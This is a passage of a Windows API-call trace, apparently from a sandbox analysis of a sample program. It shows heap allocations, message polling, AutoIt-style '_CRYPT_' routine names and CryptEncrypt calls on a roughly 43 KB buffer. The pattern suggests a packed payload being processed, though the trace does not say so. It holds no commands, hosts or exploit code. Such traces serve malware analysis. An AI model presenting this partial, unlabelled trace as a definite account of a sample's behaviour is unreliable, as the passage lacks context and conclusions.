(HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4c0 [0179.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0179.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0179.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0179.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0179.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0179.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0179.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b058 [0179.364] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0179.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0179.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0179.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0179.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0179.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d4c0 [0179.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0179.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0179.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0179.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0179.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0179.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0179.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0179.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0179.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0179.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0179.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0179.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0179.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0179.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0179.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0179.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0179.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0179.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0179.364] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0179.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0179.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0179.365] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0179.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0179.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0179.365] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.365] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.365] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0179.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0179.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0179.365] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0179.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0179.365] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0179.365] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0179.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0179.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0179.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0179.365] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0179.365] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0179.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0179.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0179.365] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0179.365] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0179.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0179.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0179.366] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0179.366] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0179.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0179.366] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0179.366] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0179.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0179.366] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0179.366] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0179.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0179.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0179.366] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.366] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0179.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0179.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0179.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0179.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0179.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0179.366] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0179.366] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0179.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0179.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0179.368] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.368] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0179.368] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0179.368] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0179.368] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0179.368] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0xa8f4, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0xa900) returned 1 [0179.368] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0179.368] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0179.368] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0179.368] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0179.368] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0179.368] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0179.368] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0179.368] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.368] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0179.368] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0179.368] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0179.368] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.368] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.368] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0179.368] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0179.369] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0179.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0179.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0179.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0179.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0179.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0179.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0179.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0179.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0179.369] CharLowerBuffW (in: lpsz="byte[43265]", cchLength=0xb | out: lpsz="byte[43265]") returned 0xb [0179.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0179.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0179.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0179.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0179.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0179.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0179.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0179.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0179.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0179.369] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0179.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0179.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0179.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0179.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0179.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0179.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0179.371] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0179.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0179.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0179.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0179.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0179.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0179.372] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0179.372] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0179.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0179.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0179.374] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0179.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0179.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0179.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0179.374] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa5f008*, pdwDataLen=0x87e820*=0xa8f4, dwBufLen=0xa900 | out: pbData=0xa5f008*, pdwDataLen=0x87e820*=0xa900) returned 1 [0179.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0179.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0179.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df050 [0179.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0179.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0179.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0179.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0179.375] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0179.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0179.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0179.375] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.375] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0179.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0179.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0179.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0179.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0179.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0179.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0179.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0179.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0179.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0179.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0179.377] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0179.377] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0179.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0179.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0179.378] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0179.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0179.378] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0179.378] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0179.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0179.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0179.378] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0179.378] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0179.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0179.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0179.378] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0179.378] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0179.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0179.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0179.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0179.378] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0179.378] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0179.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0179.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0179.378] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0179.378] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0179.378] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0179.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0179.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0179.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0179.383] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0179.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0179.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0179.383] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.383] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0179.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0179.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0179.388] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0179.388] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.388] RtlAllocateHeap (HeapHandle=0x8a0000, 